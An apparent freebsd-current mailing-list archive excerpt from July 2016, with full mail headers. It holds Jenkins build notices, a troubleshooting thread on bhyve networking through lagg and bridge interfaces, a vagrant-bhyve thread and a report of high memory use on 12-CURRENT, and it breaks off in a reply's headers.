MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 09:04:58 -0000 See From owner-freebsd-current@freebsd.org Fri Jul 29 09:12:11 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 11BF4BA7B6E for ; Fri, 29 Jul 2016 09:12:11 +0000 (UTC) (envelope-from kczekirda@gmail.com) Received: from mail-wm0-x229.google.com (mail-wm0-x229.google.com [IPv6:2a00:1450:400c:c09::229]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 87E1414B8 for ; Fri, 29 Jul 2016 09:12:10 +0000 (UTC) (envelope-from kczekirda@gmail.com) Received: by mail-wm0-x229.google.com with SMTP id f65so282049442wmi.0 for ; Fri, 29 Jul 2016 02:12:10 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:from:date:message-id :subject:to:cc; bh=syvRBVlc2cMMHxMGZ7/E21qOt6iUC0oT5l42VdxY5nI=; b=NdJK7Q0jBTZbgT1mb+wiKB63Q/Nx6o86KcyMs3ZR2BWKW7vU8Hwo6ESIAn+iJrnLsn gNOmD/PdMFjDcJiI5t4OywMV+0sciHaJBrQ19oeOr1oWVK0W/YRISG8D5Hud9/VnoUA9 6G9l8RZI63hTXOw9hZn1o2dGyZX9Df/DAra/6uSOGAcKS9j0ncCQhuGf0zUB/nnO9+Ps IOZoi56HADKQk6qqEwKKX/rWtK4zUWONdtD8JF0P0ptEcJ4fIRp1Cv7/m7Jz6/pRwC+C 8YxIBYxbhxzCeW5FCwJQTHcp6p61W0YNNEQbN3dPB8N5r7eDPgXUo8bcRyfYULz98RCW Yelg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:sender:in-reply-to:references:from :date:message-id:subject:to:cc; bh=syvRBVlc2cMMHxMGZ7/E21qOt6iUC0oT5l42VdxY5nI=; b=aCvG6DvqjKrbMyyodzTC/lNiY23Rpb6i6J6a+rMMr3OHoRaJsKKfODkQkOGPMzyYRB IBU+OdPNRYMyJKEuS9LQFp+LqPtn9nAUulqCUohwTRFz+GNPTAKWzEn1qbhOK8Uk3Xll ryh34Pu9X6ao0v6oq7B4mNPBOdfm9qRdYse2fsQ4opYZjayFe4aeJ2WKssbM36MPf29z pL0JgQV+1oAgPVmkD5xIyzNh0/PU7q/quQhYJO2twRg2Q+Nvu3bst7O17xBTPRGrvjCZ 7opfuz4SvTwGv5kHtEhL7uLwlKOFlcUZnHyctrl6GdNI0XcJK6H3Ya+aLit1aIfrLpHN Z6GQ== X-Gm-Message-State: AEkoouvN54LhbQbYf0ypdH3AIkqooDLWr+AyaW7iiJEDAj9kgZWpSyH3LAZTxqulGAc9OdGlaG5hxAOiin4lRg== X-Received: by 10.194.144.33 with SMTP id sj1mr42814117wjb.150.1469783528655; Fri, 29 Jul 2016 02:12:08 -0700 (PDT) MIME-Version: 1.0 Sender: kczekirda@gmail.com Received: by 10.195.31.166 with HTTP; Fri, 29 Jul 2016 02:11:39 -0700 (PDT) In-Reply-To: <20160729045652.GJ26793@gmail.com> References: <20160729045652.GJ26793@gmail.com> From: Kamil Czekirda Date: Fri, 29 Jul 2016 11:11:39 +0200 X-Google-Sender-Auth: MNvnwJi9EpFLgtjraA9jsUxuVqk Message-ID: Subject: Re: bhyve with lagg failover doesn't work on wifi To: Randy Westlund Cc: FreeBSD Current Content-Type: text/plain; charset=UTF-8 X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 09:12:11 -0000 I have similar problem with bridging tap0 and lagg0 (lacp). Problem I think is beetween lagg0 and tap0. I can see ICMP traffic from guest to host on bridge0 interface (ping), but no tcp (ssh). Tcpdump on host on tap0: host: 192.168.22.19 guest: 192.168.22.135 tcpdump: listening on tap0, link-type EN10MB (Ethernet), capture size 65535 bytes 09:05:17.641006 IP (tos 0x0, ttl 64, id 8317, offset 0, flags [DF], proto TCP (6), length 60) 192.168.22.135.41140 > 192.168.22.19.ssh: Flags [S], cksum 0x3133 (correct), seq 2326804792, win 29200, options [mss 1460,sackOK,TS val 2027493701 ecr 0,nop,wscale 7], length 0 09:05:17.641100 IP (tos 0x0, ttl 64, id 21800, offset 0, flags [DF], proto TCP (6), length 60) 192.168.22.19.ssh > 192.168.22.135.41140: Flags [S.], cksum 0xae19 (incorrect -> 0x4e8f), seq 3120117570, ack 2326804793, win 65535, options [mss 1460,nop,wscale 6,sackOK,TS val 941632328 ecr 2027493701], length 0 and silence on bagg0 and lagg0. I can't connect to jails on host too. Traffic for other hosts on the network works fine. Links: https://twitter.com/creepingfur/status/633360497270632448 https://wiki.freebsd.org/201510DevSummit/Virtualization Q: VirtIO/lagg bridge bug? Benjamin Perrault has observed a massive slowdown in host to VM networking with a combination of bhyve VirtIO/lagg and bridge. Works fine to the outside world but not between the host and VM. Must investigate. My configuration: em0: flags=8943 metric 0 mtu 1500 options=4219b nd6 options=29 media: Ethernet autoselect (1000baseT ) status: active em1: flags=8943 metric 0 mtu 1500 options=4019b nd6 options=29 media: Ethernet autoselect (1000baseT ) status: active lagg0: flags=8943 metric 0 mtu 1500 options=4019b nd6 options=29 media: Ethernet autoselect status: active laggproto lacp lagghash l2,l3,l4 laggport: em0 flags=1c laggport: em1 flags=1c bridge0: flags=8843 metric 0 mtu 1500 description: vm-switch nd6 options=1 id 00:00:00:00:00:00 priority 32768 hellotime 2 fwddelay 15 maxage 20 holdcnt 6 proto rstp maxaddr 2000 timeout 1200 root id 00:00:00:00:00:00 priority 32768 ifcost 0 port 0 member: tap0 flags=143 ifmaxaddr 0 port 7 priority 128 path cost 55 member: lagg0 flags=143 ifmaxaddr 0 port 5 priority 128 path cost 10000 tap0: flags=8943 metric 0 mtu 1500 options=80000 nd6 options=29 media: Ethernet autoselect status: active Opened by PID 48719 Kamil Czekirda 2016-07-29 6:56 GMT+02:00 Randy Westlund : > I'm using bhyve on 11.0-BETA2, bridging tap0 to lagg0, a failover > between wifi and ethernet. The bhyve VM's networking only works I'm > using ethernet. > > > # Lagg config. > > ifconfig_em0="up" > > create_args_wlan0="wlanaddr 3c:97:0e:46:70:ca" > > wlans_iwn0="wlan0" > > ifconfig_wlan0="WPA" > > cloned_interfaces="lagg0 bridge0 tap0" > > ifconfig_lagg0="laggproto failover laggport em0 laggport wlan0 DHCP" > > # tap0 and bridge0 are for bhyve. > > ifconfig_bridge0="addm lagg0 addm tap0" > > With the ethernet cable connected, the VM's networking works. But when > I remove the ethernet cable and lagg0 fails over to wifi, the VM can no > longer use the network. > > I can use tcpdump to see the DHCP packets going along this path: > vtnet0 -> tap0 -> bridge0 -> lagg0 -> wlan0 > > The DHCP requests appear on wlan0. But the router never sees them. > > Here's the ifconfig output when wlan0 is active: > > > em0: flags=8943 metric 0 > mtu 1500 > > > options=4219b > > ether 3c:97:0e:46:70:ca > > nd6 options=29 > > media: Ethernet autoselect > > status: no carrier > > lo0: flags=8049 metric 0 mtu 16384 > > options=600003 > > inet6 ::1 prefixlen 128 > > inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 > > inet 127.0.0.1 netmask 0xff000000 > > nd6 options=21 > > groups: lo > > wlan0: flags=8943 metric > 0 mtu 1500 > > ether 3c:97:0e:46:70:ca > > nd6 options=29 > > media: IEEE 802.11 Wireless Ethernet MCS mode 11ng > > status: associated > > ssid neural_network channel 1 (2412 MHz 11g ht/40+) bssid > c4:04:15:90:f5:fd > > regdomain FCC country US authmode WPA2/802.11i privacy ON > > deftxkey UNDEF AES-CCM 2:128-bit AES-CCM 3:128-bit txpower 30 > bmiss 10 > > scanvalid 60 protmode CTS ampdulimit 64k ampdudensity 8 > > -amsdutx amsdurx shortgi -stbc wme roaming MANUAL > > groups: wlan > > lagg0: flags=8943 metric > 0 mtu 1500 > > ether 3c:97:0e:46:70:ca > > inet 192.168.1.17 netmask 0xffffff00 broadcast 192.168.1.255 > > nd6 options=29 > > media: Ethernet autoselect > > status: active > > groups: lagg > > laggproto failover lagghash l2,l3,l4 > > laggport: em0 flags=1 > > laggport: wlan0 flags=4 > > bridge0: flags=8843 metric 0 mtu > 1500 > > ether 02:4a:6b:6e:fc:00 > > nd6 options=9 > > groups: bridge > > id 00:00:00:00:00:00 priority 32768 hellotime 2 fwddelay 15 > > maxage 20 holdcnt 6 proto rstp maxaddr 2000 timeout 1200 > > root id 00:00:00:00:00:00 priority 32768 ifcost 0 port 0 > > member: tap0 flags=143 > > ifmaxaddr 0 port 6 priority 128 path cost 2000000 > > member: lagg0 flags=143 > > ifmaxaddr 0 port 4 priority 128 path cost 55 > > tap0: flags=8943 metric > 0 mtu 1500 > > options=80000 > > ether 00:bd:ea:f0:f6:00 > > nd6 options=29 > > media: Ethernet autoselect > > status: active > > groups: tap > > Opened by PID 1322 > > From owner-freebsd-current@freebsd.org Fri Jul 29 12:08:46 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 146A3BA88B7 for ; Fri, 29 Jul 2016 12:08:46 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 068CE132B; Fri, 29 Jul 2016 12:08:46 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 226DE17C; Fri, 29 Jul 2016 12:08:46 +0000 (UTC) Date: Fri, 29 Jul 2016 12:08:45 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1618425300.50.1469794125678.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <244868077.49.1469783097375.JavaMail.jenkins@jenkins-9.freebsd.org> References: <244868077.49.1469783097375.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #497 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 12:08:46 -0000 See From owner-freebsd-current@freebsd.org Fri Jul 29 15:08:11 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 03D9BBA7B55 for ; Fri, 29 Jul 2016 15:08:11 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id EA4B61242; Fri, 29 Jul 2016 15:08:10 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 2FC1D181; Fri, 29 Jul 2016 15:08:11 +0000 (UTC) Date: Fri, 29 Jul 2016 15:08:10 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1413034919.53.1469804890560.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1618425300.50.1469794125678.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1618425300.50.1469794125678.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #498 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 15:08:11 -0000 See From owner-freebsd-current@freebsd.org Fri Jul 29 15:17:45 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 5024DBA7EB6 for ; Fri, 29 Jul 2016 15:17:45 +0000 (UTC) (envelope-from me@cschwarz.com) Received: from orion.uberspace.de (orion.uberspace.de [95.143.172.79]) (using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id E8C701A1F for ; Fri, 29 Jul 2016 15:17:44 +0000 (UTC) (envelope-from me@cschwarz.com) Received: (qmail 32139 invoked from network); 29 Jul 2016 15:10:59 -0000 Received: from localhost (HELO csarch.lan) (127.0.0.1) by orion.uberspace.de with SMTP; 29 Jul 2016 15:10:59 -0000 Date: Fri, 29 Jul 2016 17:10:57 +0200 From: Christian Schwarz To: freebsd-current@freebsd.org Subject: Re: Call for testing on vagrant-bhyve Message-ID: <20160729151057.GA16515@csarch.lan> References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.6.2 (2016-07-01) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 15:17:45 -0000 Hi, thanks for your work! Regarding the conversion process described in the README, you might also want to look into / patch vagrant-mutate: https://github.com/sciurus/vagrant-mutate People use it to convert from VirtualBox to libvirt on Linux. -- Christian Schwarz From owner-freebsd-current@freebsd.org Fri Jul 29 15:51:50 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 79AA2BA887E for ; Fri, 29 Jul 2016 15:51:50 +0000 (UTC) (envelope-from jesa7955@gmail.com) Received: from mail-ua0-x233.google.com (mail-ua0-x233.google.com [IPv6:2607:f8b0:400c:c08::233]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 339941F90 for ; Fri, 29 Jul 2016 15:51:50 +0000 (UTC) (envelope-from jesa7955@gmail.com) Received: by mail-ua0-x233.google.com with SMTP id l32so64723660ual.2 for ; Fri, 29 Jul 2016 08:51:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:references:in-reply-to:from:date:message-id:subject:to; bh=KCcjXwOEvTiDylQ6e8oiK5MOiOM0Mwgpqt53PQsboqQ=; b=ILhv5WGKZFt9f5RLtZUgFNq8AH4OEEGSoDtrhM+I5b4ORkyRwn5EVQSKfJGU5zlsTz QmE6AXAVcrShcyAq9uK1eTRHLr5ZZ1moBo0tZ2/eUzjtwRVPQ08C0bhhoFfcn9LC3+v4 beFUgNvQcdAqYWNWwqMaT7EjASdSwH91+qmE1AmxYCTRHErFmx57uiOH3U/iqSFm0Srb nLAuf2gy3yS6GgRnU8QVLPcmGS6FvazIJe29OY6nDaeRCuseSjt1lN8XdVPy1cBcUA0k wx/NBWW6hFb3S0lpmi6u6QrcmtEm5UtPs25lnG4LYk8kPuU6p8Pxm2yy/htd7i4Wg6aA 6tUQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:references:in-reply-to:from:date :message-id:subject:to; bh=KCcjXwOEvTiDylQ6e8oiK5MOiOM0Mwgpqt53PQsboqQ=; b=a/d98rGjssNemlaAIvMF9rNnX2n6SppIIcYHuF9NqFbt16MVb9zbIh2UfQzSMiFZ24 ytU7sKnOUuEHvK6rZupsIZIybZNyyYjvgPTt1or94IJbwOx+Y/7c69Nd/Lwg+JAtOqQu N26eAOJZgaWh+6hQFqA1r2GjzBNPlVzWnK/6hupLDaxwJZlt2fWw8/0NBdjZm+6rk7/a DtSQn9NpfnyYTkC2TkT5eUjU91bqZHNd8HxqqZhBdG2hQ8TkZQ6a/7tfQW4+fbogQ6E/ OF30O1bzwwVhy9dTDSBedQOoj4K5JXFrNtjFMZJgHWw0rrvzpGRgGKHsZ5EpSQzncebT PUFQ== X-Gm-Message-State: AEkoouvyPvPG7Nlnk7+8S5hgrMmmfR2n5VmJqyPg/Ymm/VTNr5qN4gHGjxvvFCEuJR32wlHh58X5G8W46T+q0g== X-Received: by 10.176.6.137 with SMTP id g9mr18794243uag.91.1469807509342; Fri, 29 Jul 2016 08:51:49 -0700 (PDT) MIME-Version: 1.0 References: <20160729151057.GA16515@csarch.lan> In-Reply-To: <20160729151057.GA16515@csarch.lan> From: Tong Li Date: Fri, 29 Jul 2016 15:51:40 +0000 Message-ID: Subject: Re: Call for testing on vagrant-bhyve To: Christian Schwarz , freebsd-current@freebsd.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 15:51:50 -0000 Hello, Thanks for your reply. One of my mentor, Steve Wills, has started working on adding support to vagrant-mutate. https://github.com/swills/vagrant-mutate/tree/bhyve But now it's limited to FreeBSD boxes, Linux boxes are more complicated, we are trying to find better ways. Now we have to convert Linux boxes manually= . Tong. 2016=E5=B9=B47=E6=9C=8829=E6=97=A5(=E9=87=91) 23:17 Christian Schwarz : > Hi, > > thanks for your work! > > Regarding the conversion process described in the README, > you might also want to look into / patch vagrant-mutate: > > https://github.com/sciurus/vagrant-mutate > > People use it to convert from VirtualBox to libvirt on Linux. > > -- > Christian Schwarz > _______________________________________________ > freebsd-current@freebsd.org mailing list > https://lists.freebsd.org/mailman/listinfo/freebsd-current > To unsubscribe, send any mail to "freebsd-current-unsubscribe@freebsd.org= " > From owner-freebsd-current@freebsd.org Fri Jul 29 18:04:18 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id EA180BA7133 for ; Fri, 29 Jul 2016 18:04:18 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from outpost1.zedat.fu-berlin.de (outpost1.zedat.fu-berlin.de [130.133.4.66]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id AD8281DB9 for ; Fri, 29 Jul 2016 18:04:18 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from inpost2.zedat.fu-berlin.de ([130.133.4.69]) by outpost.zedat.fu-berlin.de (Exim 4.85) for freebsd-current@freebsd.org with esmtps (TLSv1.2:DHE-RSA-AES256-GCM-SHA384:256) (envelope-from ) id <1bTC8o-003bzK-Bp>; Fri, 29 Jul 2016 20:04:10 +0200 Received: from x4e34a829.dyn.telefonica.de ([78.52.168.41] helo=thor.walstatt.dynvpn.de) by inpost2.zedat.fu-berlin.de (Exim 4.85) for freebsd-current@freebsd.org with esmtpsa (TLSv1.2:AES256-GCM-SHA384:256) (envelope-from ) id <1bTC8o-001M47-3k>; Fri, 29 Jul 2016 20:04:10 +0200 Date: Fri, 29 Jul 2016 20:04:58 +0200 From: "O. Hartmann" To: FreeBSD CURRENT Subject: CURRENT: memory leak? Message-ID: <20160729200458.2bb2c6ca.ohartman@zedat.fu-berlin.de> Organization: FU Berlin X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; boundary="Sig_/RGzYk/HQmKyPcV56xMByHLT"; protocol="application/pgp-signature" X-Originating-IP: 78.52.168.41 X-ZEDAT-Hint: A X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 18:04:19 -0000 --Sig_/RGzYk/HQmKyPcV56xMByHLT Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable I realise an exorbitant memory usage of FreeBSD CURRENT ( FreeBSD 12.0-CURR= ENT #16 r303470: Fri Jul 29 05:58:42 CEST 2016 ). Swap space gets eaten up while bu= ilding world/kernel and/or ports very quickly. I see this phenomenon on different CURRENT systems with different RAM (but = all ZFS!). No box is less than 8 GB RAM: one 8GB, another 16, two 32 GB. An older XEON Co= re2Duo server with postgresql 9.5/postgis acting on some OSM data etas up all of its 32 G= B and additional 48GB swap - never seen before with 11-CURRENT. I didn't investigate the problem so far since I realized this memory hunger= of 12-CURRENT just today on several boxes compiling world, eating up all the memory, star= ing swapping and never relax even after hours from the swapped memory. Is this a known phenomenon or am I seeing something mystique? Regards, Oliver --Sig_/RGzYk/HQmKyPcV56xMByHLT Content-Type: application/pgp-signature Content-Description: OpenPGP digital signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXm5rKAAoJEOgBcD7A/5N8ME0IAN5Wy8BohPmgnLjgi7ntiFK+ ccbyCu1wbQCJdT6ODHK1kRh1Wt2YmbkgW933N4vME5kgmkoGNyekHENewkp0cej0 HGhKkG3Neorhc9s1Do8i+hxGC166bwPRRijPhk59sjBCwu0ZxwOD9th2n0S/koNM LmiApgYxhpEo4fjT2Kr3/gXP/62LSZvxQVEPxWy0Jv/ZeTtXl159OxehwBR7PTKk uuHji+MAFa1SbAb/nKDl2jlhJm38wSLbYB5QgKTKIqnqacr6uOZ8Pk6KX8hNz6bx zxNigHdmMCYAE2dNWdBpGoS8NpdIiuHOKjVZ2jQ40Q0Ora1jbdJJm0/ThaLGATk= =rYpl -----END PGP SIGNATURE----- --Sig_/RGzYk/HQmKyPcV56xMByHLT-- From owner-freebsd-current@freebsd.org Fri Jul 29 18:06:13 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id F00B0BA723F for ; Fri, 29 Jul 2016 18:06:13 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id E26471F14; Fri, 29 Jul 2016 18:06:13 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 1D76E186; Fri, 29 Jul 2016 18:06:14 +0000 (UTC) Date: Fri, 29 Jul 2016 18:06:13 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1318591275.54.1469815573106.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1413034919.53.1469804890560.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1413034919.53.1469804890560.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #499 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 18:06:14 -0000 See From owner-freebsd-current@freebsd.org Fri Jul 29 19:03:13 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 58FE6BA843F for ; Fri, 29 Jul 2016 19:03:13 +0000 (UTC) (envelope-from allanjude@freebsd.org) Received: from mx1.scaleengine.net (mx1.scaleengine.net [209.51.186.6]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 3DA9015F3 for ; Fri, 29 Jul 2016 19:03:12 +0000 (UTC) (envelope-from allanjude@freebsd.org) Received: from [192.168.1.10] (unknown [192.168.1.10]) (Authenticated sender: allanjude.freebsd@scaleengine.com) by mx1.scaleengine.net (Postfix) with ESMTPSA id 9ED8F1FDF for ; Fri, 29 Jul 2016 19:03:11 +0000 (UTC) Subject: Re: CURRENT: memory leak? To: freebsd-current@freebsd.org References: <20160729200458.2bb2c6ca.ohartman@zedat.fu-berlin.de> From: Allan Jude Message-ID: <18fe457f-c99e-8747-8692-e199f356f6d5@freebsd.org> 